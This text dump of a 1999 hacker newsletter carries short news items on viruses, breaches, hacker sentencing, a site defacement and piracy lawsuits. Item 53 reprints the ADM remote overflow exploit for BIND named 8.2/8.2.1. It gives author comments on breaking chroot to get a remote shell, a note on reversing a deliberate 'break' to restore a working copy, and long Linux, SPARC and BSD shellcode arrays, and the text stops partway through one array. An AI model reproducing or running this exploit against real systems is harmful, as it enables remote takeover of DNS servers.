URL: http://www.zdnet.com/zdnn/stories/news/0,4586,1018115,00.html

There's nothing tender about the new FunLove virus.

The virus, technically called W32.FunLove, brought down the servers of a large company in Europe and has been detected in companies in the U.S., as well, according to researchers at Symantec Corp.'s (Nasdaq:SYMC) AntiVirus Research Center.

The good news is that it shouldn't spread all that fast because it doesn't have the ability to e-mail itself like the Melissa virus, said Charles Renert, director of research at SARC. The bad news is that it uses a new way to attack the file security system of the Windows NT operating system. The virus may also use the network to spread itself.

"It's a little bit of an evolution as far as virus writing is concerned," said Renert.

How it works

The virus appears as an executable file running on all flavors of Windows, from Windows 95 on up. The only way to recognize that a machine has been infected is by finding the fclss.exe file the virus drops into the Windows System directory. In turn, it infects applications with EXE, SCR or OCX extensions.

The real goal of the virus is to attack the Windows NT file security system. In order for the virus to attack, it needs administrative rights on an NT server or workstation. Once an administrator logs on to NT, the virus modifies the NT kernel so that every user has administrative rights to that machine, regardless of the protection. This means that a "guest" -- someone with the lowest possible rights on the system -- would be able to read and modify all files, including files normally accessible only by the administrator.

Symantec officials said they have added virus definitions to recognize FunLove and should have a tool available shortly to help repair an infected machine at www.symantec.com/avcenter/download.html.
Earlier this week, researchers issued warnings about the so-called BubbleBoy virus -- actually a self-replicating worm -- that can spread itself through Microsoft Corp.'s Outlook and Outlook Express software.

@HWA

45.0 Simple nomad to speak at ToorCon
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by skalor

TooRcon Computer Security Expo is proud to announce that the keynote speaker for TooRcon 2000 will be Simple Nomad of Nomad Mobile Research Center. Simple Nomad will discuss the future of hacking as we approach the new millennium.

TooRcon
http://www.toorcon.com

Nomad Mobile Research Center
http://www.nmrc.org

HNN Cons Page - more con information
http://www.hackernews.com/cons/cons.html

@HWA

46.0 Distributed Attempt to Break 56bit CS-Cipher
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by x-empt

Similar to projects from distributed.net and SETI@Home, this project promises 10,000 Euros (roughly $10,500) to whoever finds the correct encryption key. DCypher.Net, accepting CS Group's CS-Cipher challenge, will attempt to break their 56 bit key using a brute force attack in a distributed computing effort. Currently the Win32 clients are out and a Linux version will be out shortly. (Hmmmmm no one has started an HNN team yet.)

Dcypher.net
http://www.dcypher.net/

@HWA

47.0 CallNet Admits to Security Blunder
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

The UK based toll-free ISP CallNet 0800 admitted that the financial security of thousands of their subscribers was compromised after the VeriSign digital verification system that was meant to secure their on line transactions did not arrive on time. The online registration which required users to enter their credit card information to make available the discounts in 0800's services, went up last Wednesday and was only taken down this week.
The UK Register
http://www.theregister.co.uk/991110-000015.html

Posted 10/11/99 1:56pm by Tim Richardson

Security hole found at CallNet 0800

CallNet 0800 compromised the financial security of thousands of Net users last week after it admitted that its online registration system was not totally secure.

Although the toll-free ISP maintains there was never a problem with its servers, it has revealed that the transaction process between the user and CallNet 0800 was not secure.

The registration system that allowed people to register their credit card and personal details online went live last Wednesday and was only shut down this week. Net users need to register their credit card details with CallNet 0800 to take advantage of cut-price telephone calls.

Keith Goodyear, VP of CallNet UK said the episode was an "oversight" by the company. The problem arose because the VeriSign digital certification system that would have secured the online transactions was not delivered on time, claimed Goodyear. CallNet is still waiting for the VeriSign certificate and has disconnected the online sign-up service until it arrives and is in place.

"The chances of anyone's details being hacked [en route] are minimal," said Goodyear, adding that there had been no reports of any security breaches.

But CallNet's apparent lackadaisical approach to security has angered some people. One reader, who asked not to be named, said he was so worried when he found out he intended to cancel his credit card just in case his security has been compromised.

Elsewhere, Simon Lofthouse, a spokesman for Britain's first digital certification authority, Inter Clear Services, said: "At best this is careless, at worst negligent."

While Lofthouse agreed with Goodyear that the chances of people's personal details being hacked were slim, he said it was simply too much of a risk to take. "Chances are they wouldn't get hit, but what if they had?
It's not just their reputation that goes the drain, it is the whole industry [that has to carry the can]." ®

@HWA

48.0 Singapore Pair Sentenced After Posting Passwords
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

Pang Soon Chen, 19, and David Kok Tuck Whye, 22, of Singapore, have been sentenced for 8 and 22 months in jail respectively after pleading guilty to stealing the user names and passwords of SingNet customers and students at the National University of Singapore. This password theft was apparently accomplished using NetBus. The pair then posted the names and passwords they had stolen to the internet.

IT @ Asia One
http://it.asia1.com.sg/html/news/news004_19991111.html

2 youths jailed for hacking rampage

54 Became Their Victims

By CHANG AI-LIEN

TWO youths were yesterday jailed for hacking into the computer systems of Internet users and posting their passwords on a public website.

Pang Soon Chen, 19, was sentenced to 15 months' jail while David Kok Tuck Whye, 22, was jailed eight months after they pleaded guilty to the crimes.

Pang and Kok obtained the passwords of SingNet and National University of Singapore Internet account holders illegally, used some of these accounts to surf and posted some passwords publicly on "Sicknet", a website hosted in the US.

The district court heard that the youths had known each other since 1997. In December last year, Kok told Pang that he was having problems with his personal computer system -- it would shut down for no apparent reason or the CD-ROM tray would eject itself.

Pang found out that Kok's system had been hacked into by a Netbus program. He then downloaded the program from a website and told Kok about it. Pang and Kok used the program to get the names and passwords of their victims, by connecting it to users' computer systems and executing certain commands.
Pang then designed the Sicknet webpage to show off his capabilities and posted a list of SingNet user names and passwords in it. Kok then suggested that he should add more names to the page to give the impression that it had been created by a group of people.

Pang sent mass messages through the Internet Relay Chat inviting people to visit the page, and it caught the attention of SingNet because of its similarity to SingNet's own webpage. The duo was arrested in March this year.

Pang, unemployed, had faced 85 charges, including unauthorised access to computer materials and services, and unauthorised disclosure of access code. Kok, a Nanyang Academy of Fine Arts student then, had faced 26 similar or related charges.

Calling for a deterrent sentence, Deputy Public Prosecutor Christopher Ong referred to Chief Justice Yong Pung How's recent landmark decision which sent a teenage hacker to a four-month jail term. In this case, he said the two culprits had gone on a rampage, hacking the computer systems of a total of 54 victims, and the website was created to show off their prowess. "The arrogance and maliciousness of the accused persons is self-evident."

Yesterday, the duo showed no emotion when District Judge F.G. Remedios sentenced them to jail.

Straits Times

@HWA

49.0 Singapore Agencies to Investigate Defacement of Government Web Site
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by lamer

The Ministry of Law's Integrated Land Information Service in Singapore shut down its web site pending an investigation. The web site was defaced earlier this week. The National Computer Board (NCB) and the Singapore Computer Response Team (SingCert) will work with National Computer Systems (NCS) during the investigation.
IT @ Asia One
http://it.asia1.com.sg/html/news/news001_19991111.html

Mirror of Defaced Page - provided by Attrition.org
http://www.attrition.org/mirror/attrition/1999/11/09/www.inlis.gov.sg/

IT @ Asia One;

Govt web server shut down after hacker strike

By CHONG CHEE KIN

A GOVERNMENT Internet server here has been shut down for investigations after it was hacked into and a home page defaced on Tuesday.

The site is the Ministry of Law's Integrated Land Information Service (Inlis) on the Internet. The service gives details about land in Singapore, and allows users to pinpoint locations on a map and print them out.

The home page was defaced at about 6 pm, the ministry said yesterday, in response to questions. In a statement, it said the Inlis operator, National Computer Systems (NCS), shut down the web server when it found out that the home page had been defaced. "Only the main page of the public website was defaced. Other systems, transaction records and the data on Inlis were not affected."

Reassuring the users of the system, it stressed that the transactions done on Inlis were not compromised. The National Computer Board (NCB) and the Singapore Computer Response Team (SingCert) were helping NCS in investigating the incident. The ministry added that NCS had lodged a police report. The operator had indicated that Inlis services would resume as soon as possible.

This is the third such attack on government or Singapore-related websites in two months. When contacted yesterday about this and the measures being taken, the NCB said the incidents showed the risk the world faced as computers and IT became an integral part of life. Hacking was a continual problem as new loopholes were found every day.

In a statement, it said: "The challenge for us is to stay vigilant, to keep abreast of and apply the latest available measures to deal with security problems. "This is a continuing challenge that all website administrators will have to cope with."
It added that the websites it managed were checked and updated with the latest security software. But protective measures could not take up too much resources or make it unnecessarily inconvenient for the public to access services.

The NCB added that it had set up SingCert -- a computer security team -- in 1997 to help Singapore in the detection and prevention of security-related incidents on the Internet. It was also working closely with the police on the recent incidents. The board said hacking was a serious crime and it hoped investigations would be completed soon and the culprits brought to book.

Straits Times

@HWA

50.0 BSA Targets IRC For Piracy
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by arab_terrorist9

The Business Software Alliance (BSA) today announced it has launched a new initiative aimed at shutting down illegal trafficking in software on the Internet. As part of the initiative, BSA has filed a lawsuit against twenty-five individuals allegedly participating in the "warez4cable" IRC channel, an Internet forum used to traffic in pirated software. This is the first lawsuit ever filed against individuals for pirating software in an IRC channel.

Business Software Alliance
http://www.bsa.org/pressbox/enforcement/index.html?/pressbox/enforcement/942331921.html

SOFTWARE WATCHDOG ATTACKS CYBERPIRACY

BSA Files Lawsuit Against 25 Individuals for Alleged Piracy in High-Speed IRC Channel; Seizes Computers in California and Michigan

Washington, D.C. (11 November 1999) -- The Business Software Alliance (BSA) today announced it has launched a new initiative aimed at shutting down illegal trafficking in software on the Internet. As part of the initiative, BSA has filed a lawsuit against twenty-five individuals allegedly participating in the "warez4cable" IRC channel, an Internet forum used to traffic in pirated software. This is the first lawsuit ever filed against individuals for pirating software in an IRC channel.
In the past week, under the supervision of U.S. Marshals, BSA carried out unannounced inspections of computer equipment at residences in Sacramento and Downey, CA, and in Troy and West Bloomfield, MI, seizing five computers. Under U.S. law, all twenty-five defendants named in the lawsuit are potentially liable for damages up to $100,000 per copyrighted work infringed. "Because of the increased access to high-speed connections, piracy in IRC channels is fast becoming one of the most popular ways to traffic in illegal software on the Internet," said Bob Kruger, vice president of enforcement for BSA. "That is why BSA is taking immediate action against this aggressive form of piracy," continued Kruger. The lawsuit results from months of intensive investigation by BSA's Online Investigative Unit. By using a special subpoena procedure created by the Digital Millennium Copyright Act enacted by Congress in 1998, BSA was able to identify the individuals named in the suit and take legal action against them. The lawsuit adds a new dimension to BSA's Internet anti-piracy campaign that to date has involved the shutting down of thousands of warez web sites and working closely with law enforcement to promote criminal prosecutions. "This lawsuit is part of BSA's on-going campaign to keep the Internet from becoming a safe haven for the conduct of software piracy," said Kruger. "Anyone who thinks that they can hide behind the anonymity of the Internet to commit copyright infringement had better know that the law gives them no quarter," continued Kruger. **Since 1988, the Business Software Alliance (BSA) has been the voice of the world's leading Software developers before governments and with consumers in the international marketplace. Its members represent the fastest growing industry in the world. BSA educates computer users on software copyright; advocates public policy that fosters innovation and expands trade opportunities; and fights software piracy. 
BSA worldwide members include Adobe, Apple, Attachmate, Autodesk, Bentley Systems, Corel Corporation, Lotus Development, Macromedia, Microsoft, Network Associates, Novell, Symantec and Visio. BSA websites: www.bsa.org; www.nopiracy.com.**

@HWA

51.0 Law Firm Sued Over Possible Cyber Attack
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

Once again the mainstream media is a little slow on the uptake. Internetnews.com is finally reporting on a story that HNN mentioned over a month ago. Moore Publishing of Pennsylvania is seeking more than $10 million dollars in damages from the Washington based legal firm of Steptoe & Johnson. The suit alleges that an employee of Steptoe & Johnson attempted to break in to the computer systems of Moore Publishing. Steptoe has vehemently denied the charges but Moore claims that they have logs that will prove their case. The attacks appear to have been launched as retaliation when Moore Publishing registered the Internet address steptoejohnson.com.

Internet News
http://www.internetnews.com/bus-news/article/0,1087,3_237441,00.html

HNN Archive for September 28, 1999
http://www.hackernews.com/arch.html?092899#3

Internet News;

Law Firm Accused of Cyberattack in Domain Dispute

November 11, 1999
By Brian McWilliams
InternetNews.com Correspondent

Steptoe and Johnson, a leading Washington, D.C., law firm, is accused of trying to settle a domain dispute by launching a cyberwar against a cybersquatter that registered its name.

Steptoe is accused of hacking into a server operated by Moore Publishing Co., which operates an information service for investigators called Dig Dirt.

Moore has filed a lawsuit in US District Court against Steptoe, alleging that the law firm repeatedly attempted to hack into its server in August and later launched a denial of service attack against it.
The complaint also alleges that a Steptoe employee used a hijacked Internet account to post a message in newsgroups defaming Moore.

Moore is seeking 10 million dollars in damages against Steptoe.

According to Rodney Sweetland, the attorney representing Moore, the attacks appear to have been launched as retaliation when his client registered the Internet address steptoejohnson.com.

"If they contended that my client violated the Lanham Act or was a cybersquatter, there are legitimate means to take care of that. But hacking and denial of service attacks are not part of the legitimate means of dealing with it," Sweetland said.

Sweetland said that Steptoe has not initiated a domain dispute with Network Solutions (NSOL).

Steptoe officials were not available for comment.

A speculative cybersquatter, Moore has also registered several other domains that include the names of well known law firms, including kpmgpeatmarwick.com and kirklandellis.com.

@HWA

52.0 New E-Zine Issues Released
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by phonepunx and set-fw

Phone Punx Magazine #3 has been released with articles on Caller ID, Trunked radio, ANI and more. The newest release of the veteran H/P/C/V Spanish ezine Saqueadores Edición Técnica is now available. This issue features articles on Quantum Crypto, Hacking PacketShaper, Tempest, UnderCon and a lot more.

Phone Punx Magazine #3
http://fly.to/ppn

Saqueadores Edición Técnica
http://www.set-ezine.org

@HWA

53.0 'Fixed' version of the new ADM-BIND exploit
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
 * ADM CONFIDENTIAL -- (ADM Confidential Restricted when
 * combined with the aggregated modules for this product)
 * OBJECT CODE ONLY SOURCE MATERIALS
 * (C) COPYRIGHT ADM Crew. 1999
 * All Rights Reserved
 *
 * This module may not be used, published, distributed or archived without
 * the written permission of the ADM Crew. Please contact your local sales
 * representative.
 *
 * ADM named 8.2/8.2.1 NXT remote overflow - horizon/plaguez
 *
 * "a misanthropic anthropoid with nothing to say"
 *
 * thanks to stran9er for sdnsofw.c
 *
 * Intel exploitation is pretty straightforward.. should give you a remote
 * shell. The shellcode will break chroot, do a getpeername on all open
 * sockets, and dup to the first one that returns AFINET. It also forks and
 * runs a command in case the fd duping doesn't go well. Solaris/SPARC is a
 * bit more complicated.. we are going through a well trodden part of the
 * code, so we don't get the context switch we need to have it populate the
 * register windows from the stack. However, if you just hammer the service
 * with requests, you will quickly get a context switch at the right time.
 * Thus, the SPARC shellcode currently only breaks chroot, closes current
 * fd's and runs a command.
 * Also, the NetBSD shellcode doesn't break chroot because they stop the
 * dir tricks. Of course, they allow mknods in chrooted environments, so
 * if named is running as root, then it still might be exploitable.
 * The non-exec stack patch version returns into a malloc'ed buffer, whose
 * address can vary quite a lot. Thus, it may not be as reliable as the other
 * versions..
 *
 * We broke this just a little in order to raise the bar on using it
 * (just slightly).. If you'd like to test it on your own box, put a shell
 * in /adm/sh, or /adm/ksh for solaris on the target machine.
 *
 * This version: replaced 0x61,0x64,0x6d with 0x62,0x69,0x6e tnx Aphex.
 * shell code where BIN should have been located was replaced with ADM
 * simply replace the ADM code with BIN and you have a working copy.
 *
 * Note that you need ownership of an NS or have some way of fooling an NS to
 * query your ip in order to run this exploit successfully.
 * if you dunno what an NS is you're too lost to use this.
- Cruciphux */ #include #include #include #include #include #include #include #include #include #include #include #include #include char linuxcode[]= {0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d, 0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0, 0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9, 0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0, 0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3, 0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89, 0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56, 0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75, 0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73, 0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69, 0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74, 0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79, 0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69, 0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67, 0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56, 0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0, 0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0, 0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3, 0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 
0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46, 0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff, 0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f, 0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b, 0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d}; char sc[]= {0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0, 0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc, 0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0, 0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10, 0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0, 0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3, 0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90, 0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80, 0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0, 0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4, 0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0, 0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8, 0x1,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f, 0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0}; char bsdcode[]= {0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0, 0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0, 
0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2, 0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7, 0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0, 0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0, 0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0, 0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d, 0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50, 0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80, 0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68, 0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65, 0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63, 0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65, 0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63, 0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68, 0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65, 0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73, 0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a, 0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70, 0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31, 0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50, 0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8, 0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd, 0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a, 0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a, 0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38, 
0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46, 0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff, 0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d, 0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0, 0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f, 0x59,0x4f,0x0}; char bsdnochroot[]= {0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf, 0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46, 0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50, 0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0, 0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c, 0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67, 0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65, 0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72, 0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69, 0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c, 0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79, 0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f, 0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67, 0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75, 0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61, 0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d, 0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d, 
